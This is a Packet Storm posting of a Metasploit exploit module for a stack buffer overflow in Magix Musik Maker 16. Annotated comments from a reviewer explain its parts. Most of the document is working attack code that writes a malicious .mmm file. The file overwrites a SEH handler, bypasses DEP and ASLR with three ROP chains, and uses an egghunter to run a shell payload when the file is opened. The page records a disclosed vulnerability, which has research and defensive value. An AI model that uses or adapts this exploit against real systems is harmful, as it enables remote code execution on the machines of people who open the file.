
Magix Musik Maker 16 .mmm Stack Buffer Overflow

🗓️ 23 May 2011 00:00:00 · Reported by corelanc0d3r · Type: packetstorm
🔗 Source: packetstormsecurity.com

This module exploits a stack buffer overflow in Magix Musik Maker 16. An unsafe strcpy() allows a SEH handler to be overwritten. The exploit bypasses DEP and ASLR and works on XP, Vista and Windows 7. An egghunter is used, so it may take several seconds to receive a shell.

Code
`##  
# $Id: magix_musikmaker_16_mmm.rb 12688 2011-05-22 23:41:15Z swtornio $  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
require 'msf/core'  
  
# Metasploit file-format exploit module for Magix Musik Maker 16 (.mmm).
#
# The module does no network I/O of its own: #exploit assembles one crafted
# arrangement file in memory and hands it to file_create (FILEFORMAT mixin),
# which writes it to the path given by the FILENAME option. The Egghunter
# mixin supplies generate_egghunter.
class Metasploit3 < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Remote::Egghunter

  # Registers module metadata and options.
  #
  # The single target carries the two values #exploit reads: 'OffSet', which
  # sizes the padding after the first ROP chain so that 'Ret' lands on the
  # SEH handler, and 'Ret', the address written over that handler (see the
  # author's gadget comment). FILENAME is the only user-facing option.
  #
  # @param info [Hash] module info supplied by the framework, merged through update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Magix Musik Maker 16 .mmm Stack Buffer Overflow',
      'Description' => %q{  
This module exploits a stack buffer overflow in Magix Musik Maker 16.  
When opening a specially crafted arrangement file (.mmm) in the application, an  
unsafe strcpy() will allow you to overwrite a SEH handler. This exploit  
bypasses DEP & ASLR, and works on XP, Vista & Windows 7. Egghunter is used, and  
might require up to several seconds to receive a shell.  
},
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'acidgen', #found the vulnerability
          'corelanc0d3r' #rop exploit + msf module
        ],
      'Version' => '$Revision: 12688 $',
      'References' =>
        [
          [ 'OSVDB', '72455'],
          [ 'URL', 'http://www.corelan.be/advisories.php?id=CORELAN-11-002' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload' =>
        {
          'Space' => 8000, #could be more, but this is enough
          # NOTE(review): a String rather than the boolean true; any non-nil
          # value is truthy in Ruby so it acts as enabled - confirm the
          # framework reads it that way.
          'DisableNops' => 'True',
          'BadChars' => "\x00\x0a\x0d",
        },
      'Platform' => 'win',
      'Targets' =>
        [
          [
            'Windows Universal DEP & ASLR Bypass',
            {
              'OffSet' => 198,
              'Ret' => 0x200146fa, #add esp,40c/ret [ltkrn14n.dll]
            }
          ],
        ],
      'Privileged' => false,
      'DisclosureDate' => 'Apr 26 2011',
      'DefaultTarget' => 0))

    register_options(
      [
        OptString.new('FILENAME', [ true, 'mmm file', 'msf.mmm']),
      ], self.class)
  end

  # Random 32-bit filler word for the ROP chains.
  #
  # Four random bytes are unpacked as one native-endian unsigned 32-bit
  # integer; the trailing .to_i is a no-op on an Integer. Every `junk`
  # reference in the chain arrays below is a separate call, so each filler
  # word is independently random.
  #
  # @return [Integer] unsigned 32-bit value
  def junk
    return rand_text(4).unpack("L")[0].to_i
  end

  # Assembles the crafted .mmm file and writes it with file_create.
  #
  # Appended in order: a RIFF/SEKDSVIP header with an embedded "physfile"
  # record, a path string built from repeated gadget addresses, ROP chain 1,
  # random padding sized from target['OffSet'], target.ret over the SEH
  # handler, a short fixed filler, ROP chains 2 and 3, a small raw-x86 stub,
  # the egghunter, a NOP sled and finally the egg carrying payload.encoded.
  #
  # Reads datastore['FILENAME'], target['OffSet'], target.ret and
  # payload.encoded. The return value is not meaningful; the side effect is
  # the file written by file_create.
  def exploit

    print_status("Creating '#{datastore['FILENAME']}' file ...")

    # NOTE(review): empty here, while the module's 'BadChars' excludes
    # \x00\x0a\x0d, so the egghunter itself is generated without that
    # restriction - confirm this is intentional.
    badchars = ""
    # Options passed to generate_egghunter (Egghunter mixin); see that mixin
    # for the meaning of the dep* keys.
    eggoptions =
      {
        :checksum => false,
        :eggtag => "Wo0t",
        :depmethod => "copy",
        :depreg => "edi",
        :depdest => "ebp"
      }
    hunter,egg = generate_egghunter(payload.encoded,badchars,eggoptions)

    # RIFF container header followed by a "physfile" record. The fixed bytes
    # presumably mirror a legitimate arrangement file - confirm against the
    # format; only the user-name component of the first path is randomised.
    header = "RIFF"
    header << "\x8c"
    header << "A"
    header << "\x07\x00"
    header << "SEKDSVIP"
    header << "\x10\x07\x00\x00\x9b"
    header << "[n"
    header << "\x00" * 5
    header << "\x11"
    header << "\x00" * 3
    header << "\x08"
    header << "\x00" * 3
    header << "D"
    header << "\xac\x00\x00\x11"
    header << "\x00" * 9
    header << "9@"
    header << "\x00\x00\xf0"
    header << "B"
    header << "\x00" * 4
    header << "\xbd\x04\xef\xfe\x00\x00\x01"
    header << "\x00" * 3
    header << "\x10\x00\x04\x00\x02"
    header << "\x00" * 3
    header << "\x10\x00\x04\x00\x02\x00"
    header << "?"
    header << "\x00" * 3
    header << "("
    header << "\x00" * 3
    header << "\x04\x00\x04\x00\x01"
    header << "\x00" * 15
    header << "K"
    header << "\x91"
    header << "2"
    header << "\x01\xd0\x02\x00\x00"
    header << "@"
    header << "\x02\x00\x00"
    header << "UUUUUU"
    header << "\xf5"
    header << "?"
    header << "\x10"
    header << "\x00" * 7
    header << "\xff" * 8
    header << "\x00" * 1680
    header << "LISTx"
    header << "\x95\x02\x00"
    header << "physfile"
    header << "\xf8\x08\x00\x00"
    header << "C:\\Documents and Settings\\"
    header << rand_text(8)
    header << "\\My Documents\\MAGIX_Music_Maker_16\\AudioTemp"
    header << "\x00" * 52
    header << "Fat Rocker I_ogg.HDP"
    header << "\x00" * 110
    header << "C:\\Documents and Settings\\All Users\\Application Data\\MAGIX\\Music_Maker_16\\_Demos\\Demo"
    header << "\x00" * 175
    header << "Fat Rocker I.OGG"
    header << "\x00" * 678
    header << "\xf0\xbf"
    header << "\x00" * 22
    header << "\xf0"
    header << "?"
    header << "\x00" * 6
    header << "^@"
    header << "\x00" * 6
    header << "^@"
    header << "\x00" * 264

    # Over-long path value (presumably what the vulnerable strcpy() copies -
    # confirm against the advisory): one gadget address repeated 14 times,
    # then one aligning entry, as the author's comments describe.
    filename = "C:\\temp\\"
    filename << "\xb3\x10\xf8\x1f" * 14 # slide
    filename << "\x1e\x92\x01\x20" # align

    # ROP chain 1. Every entry becomes one 32-bit little-endian word ("V*");
    # `junk` entries are random padding for the POPs / RETN n of the
    # preceding gadget. Gadget comments are the author's.
    rop_chain1 =
      [
        #API pointer
        0x2004e493, # PUSH ESP # ADD EAX,20 # POP EBX # RETN ** [LTKRN14N.dll]
        0x1ff810b3, # rop nop
        0x1ff810b3, # rop nop
        0x1ff810b3, # rop nop
        0x20047f30, # POP ECX # RETN ** [LTKRN14N.dll]
        0x2005012c, # &API ptr
        0x200263e4, # MOV EAX,DWORD PTR DS:[ECX] # RETN ** [LTKRN14N.dll]
        0x1ffa3ab3, # MOV DWORD PTR DS:[EBX],EAX # MOV EAX,1 # POP EBX # RETN 0C ** [LTDIS14n.dll]
        junk,
        0x2004e493, # PUSH ESP # ADD EAX,20 # POP EBX # RETN ** [LTKRN14N.dll]
        junk,
        junk,
        junk,
        0x20035546, # MOV EAX,EBX # POP EBP # POP EBX # RETN ** [LTKRN14N.dll]
        junk,
        junk,
        0x1ff95f45, # PUSH EAX # POP ESI # RETN 08 ** [LTDIS14n.dll]
        0x1ffa82ef, # POP EAX # RETN
        junk,
        junk,
        0x2E9FA63D,
        0x2004cb15, # ADD EAX,74085539 # ADD EAX,5D58046A # RETN ** [LTKRN14N.dll] D16059A3
        0x1ff93af7, # ADD EAX,ESI # POP ESI # RETN ** [LTDIS14n.dll]
        junk,
        0x20047f30, # POP ECX # RETN ** [LTKRN14N.dll]
        0x2001283a, # POP ESI # POP EBP # POP EBX # ADD ESP,1F4 # RETN 10 ** [LTKRN14N.dll]
        # write
        0x1ff9cf5a, # MOV DWORD PTR DS:[EAX],ECX # MOV EAX,1 # POP ESI # RETN 08 ** [LTDIS14n.dll]
        junk,
        0x2004e493, # PUSH ESP # ADD EAX,20 # POP EBX # RETN ** [LTKRN14N.dll]
        junk,
        junk,
        0x20035546, # MOV EAX,EBX # POP EBP # POP EBX # RETN ** [LTKRN14N.dll]
        junk,
        junk,
        0x1ff95f45, # PUSH EAX # POP ESI # RETN 08 ** [LTDIS14n.dll]
        0x1ffa82ef, # POP EAX # RETN
        junk,
        junk,
        0x2E9FA5F9,
        0x2004cb15, # ADD EAX,74085539 # ADD EAX,5D58046A # RETN ** [LTKRN14N.dll]
        0x1ff93af7, # ADD EAX,ESI # POP ESI # RETN ** [LTDIS14n.dll]
        junk,
        0x2003e6cd, # MOV DWORD PTR DS:[EAX],EDI # POP EDI # POP ESI # MOV EAX,1 # RETN 10 ** [LTKRN14N.dll]
        junk,
        junk,
        0x1ffa82ef, # POP EAX # RETN ** [LTDIS14n.dll]
        junk,
      ].pack("V*")


    # ROP chain 2; same packing and `junk` convention as chain 1.
    rop_chain2 = [
      0x2004cb15, # ADD EAX,74085539 # ADD EAX,5D58046A # RETN ** [LTKRN14N.dll]
      0x1ff7c4e5, # XCHG EAX,EDI # RETN ** [LTDIS14n.dll]
      0x2004e493, # PUSH ESP # ADD EAX,20 # POP EBX # RETN ** [LTKRN14N.dll]
      0x20035546, # MOV EAX,EBX # POP EBP # POP EBX # RETN ** [LTKRN14N.dll]
      junk,
      junk,
      0x1ff95f45, # PUSH EAX # POP ESI # RETN 08 ** [LTDIS14n.dll]
      0x1ffa82ef, # POP EAX # RETN
      junk,
      junk,
      0x2E9FA591,
      0x2004cb15, # ADD EAX,74085539 # ADD EAX,5D58046A # RETN ** [LTKRN14N.dll] D16059A3
      0x1ff93af7, # ADD EAX,ESI # POP ESI # RETN ** [LTDIS14n.dll]
      junk,
      0x2003e6cd, # MOV DWORD PTR DS:[EAX],EDI # POP EDI # POP ESI # MOV EAX,1 #
      junk,
      junk,
      0x1ffa82ef, # POP EAX # RETN ** [LTDIS14n.dll]
      junk,
      junk,
      junk,
      junk,
      0x2E9FB65D,
      0x2004cb15, # ADD EAX,74085539 # ADD EAX,5D58046A # RETN ** [LTKRN14N.dll]
      0x1ff7c4e5, # XCHG EAX,EDI # RETN ** [LTDIS14n.dll]
      0x2004e493, # PUSH ESP # ADD EAX,20 # POP EBX # RETN ** [LTKRN14N.dll]
      0x20035546, # MOV EAX,EBX # POP EBP # POP EBX # RETN ** [LTKRN14N.dll]
      junk,
      junk,
      0x1ff95f45, # PUSH EAX # POP ESI # RETN 08 ** [LTDIS14n.dll]
      0x1ffa82ef, # POP EAX # RETN
      junk,
      junk,
      0x2E9FA539,
      0x2004cb15, # ADD EAX,74085539 # ADD EAX,5D58046A # RETN **D16059A3 [LTKRN14N.dll]
      0x1ff93af7, # ADD EAX,ESI # POP ESI # RETN ** [LTDIS14n.dll]
      junk,
      0x2003e6cd, # MOV DWORD PTR DS:[EAX],EDI # POP EDI # POP ESI # MOV EAX,1 # RETN 10
      junk,
      junk,
      0x2004e494, # ADD EAX,20 # POP EBX # RETN ** [LTKRN14N.dll]
      junk,
      junk,
      junk,
      junk,
      junk,
      0x2004e494, # ADD EAX,20 # POP EBX # RETN ** [LTKRN14N.dll]
      junk,
      0x1ffa0231, # DEC EAX # RETN ** [LTDIS14n.dll]
      0x1ff7c4e5, # XCHG EAX,EDI # RETN ** [LTDIS14n.dll]
      0x2004e493, # PUSH ESP # ADD EAX,20 # POP EBX # RETN ** [LTKRN14N.dll]
      0x20035546, # MOV EAX,EBX # POP EBP # POP EBX # RETN ** [LTKRN14N.dll]
      junk,
      junk,
      0x1ff95f45, # PUSH EAX # POP ESI # RETN 08 ** [LTDIS14n.dll]
      0x1ffa82ef, # POP EAX # RETN
      junk,
      junk,
      0x2E9FA4D9,
      0x2004cb15, # ADD EAX,74085539 # ADD EAX,5D58046A # RETN D16059A3
      0x1ff93af7, # ADD EAX,ESI # POP ESI # RETN ** [LTDIS14n.dll]
      junk,
      0x2003e6cd, # MOV DWORD PTR DS:[EAX],EDI # POP EDI # POP ESI # MOV EAX,1 # RETN 10 ** [LTKRN14N.dll]
      junk,
      junk,
      0x2004e493, # PUSH ESP # ADD EAX,20 # POP EBX # RETN ** [LTKRN14N.dll]
      junk,
      junk,
      junk,
      junk,
      0x20035546, # MOV EAX,EBX # POP EBP # POP EBX # RETN ** [LTKRN14N.dll]
      junk,
      junk,
      0x1ff95f45, # PUSH EAX # POP ESI # RETN 08 ** [LTDIS14n.dll]
      0x1ffa82ef, # POP EAX # RETN
      junk,
      junk,
      0x2E9FA469,
      0x2004cb15, # ADD EAX,74085539 # ADD EAX,5D58046A # RETN ** [LTKRN14N.dll]
      0x1ff93af7, # ADD EAX,ESI # POP ESI # RETN ** [LTDIS14n.dll]
      junk,
      0x1ff72ce1, # XCHG EAX,ESP # POP EDI # POP ESI # POP EBP # POP EBX # MOV EAX,1 # RETN
      junk,
    ].pack("V*")

    # ROP chain 3; same packing and `junk` convention as chain 1.
    rop_chain3 = [
      0x1ff95f45, # PUSH EAX # POP ESI # RETN 08
      junk,
      junk,
      junk,
      junk,
      0x1ffa82ef, # POP EAX # RETN
      junk,
      junk,
      0x2004FF98,
      0x1ffaccf6, # ADD EAX,100 # POP EBP # RETN
      junk,
      0x20026406, # MOV EAX,DWORD PTR DS:[EAX] # NEG EAX # RETN ** [LTKRN14N.dll]
      0x20026408, # NEG EAX # RETN ** [LTKRN14N.dll]
      0x1ff7c4e5, # XCHG EAX,EDI # RETN ** [LTDIS14n.dll]
      0x2004da79, # XOR EAX,EAX # RETN ** [LTKRN14N.dll]
      0x1ff93ae1, # ADD EAX,ESI # POP ESI # RETN
      junk,
      0x1ff95f45, # PUSH EAX # POP ESI # RETN 08 ** [LTDIS14n.dll]
      0x1fffeb75, # XCHG EAX,EBP # RETN ** [LTKRN14N.dll]
      junk,
      junk,
      #Oh Irony !
      0x6001ac84, # PUSHAD # RETN ** [ijl10.dll]
    ].pack("V*")

    # Random padding so that target.ret, appended right after it below, lands
    # on the SEH handler. The -2 is not explained in the original - presumably
    # it accounts for bytes elsewhere in the layout; confirm before changing.
    rop_chain1_filler = rand_text(target['OffSet'] - rop_chain1.length - 2 )

    # Short raw-x86 stub executed ahead of the egghunter; the per-instruction
    # meaning is in the author's comments.
    # find a close heap
    prehunter = "\x33\xC0" #xor eax,eax
    prehunter << "\x64\x8B\x40\x30" #mov eax,fs[:30]
    prehunter << "\x83\xC0\x48" #add eax,48
    prehunter << "\x83\xC0\x48" #add eax,48
    prehunter << "\x8B\x10" #mov edx,[eax]
    prehunter << "\x83\xc2\x4c" #add edx,4c
    prehunter << "\x83\xc2\x4c" #add edx,4c
    prehunter << "\x8B\x12" #mov edx,[edx]

    # 100-byte NOP sled placed between the hunter and the egg.
    nops = make_nops(100)

    # Fixed words placed directly after the SEH handler overwrite; the
    # author's comments describe each entry.
    filler = "\x5D\xC6\x9F\x2E" # offset to 0x2000
    filler << "\xc2\x53\x02\x20" # RETN
    filler << "\x04\x80\xfa\x1f" # jump - first run : 0x1ffa8004 : {pivot 8} # POP EDI # POP EBP # RETN ** [LTDIS14n.dll]
    filler << "\x12\x3a\xff\x1f" # p/p/p/p/add esp,90/ret [ltkrn14n.dll] - second run
    filler << "\xff\xff\xff\xff" # access violation

    # NOTE(review): `buffer = header` does not copy - both names refer to the
    # same String object, so every `<<` below also extends `header`. The
    # `header + buffer` further down is therefore the assembled buffer
    # concatenated with itself. The module is presented as working in this
    # form (GoodRanking), so it is left unchanged; confirm whether the
    # duplication is intended before touching it (a real copy would be
    # `buffer = header.dup`).
    buffer = header
    buffer << filename
    buffer << rop_chain1
    buffer << rop_chain1_filler
    buffer << [target.ret].pack("V")
    buffer << filler
    buffer << rop_chain2
    buffer << rop_chain3
    buffer << prehunter
    buffer << hunter
    buffer << nops
    buffer << egg

    # See the aliasing note above: with header and buffer being the same
    # object this evaluates to buffer + buffer.
    filecontent = header + buffer

    print_status("Writing payload to file")

    file_create(filecontent)

  end

end
`
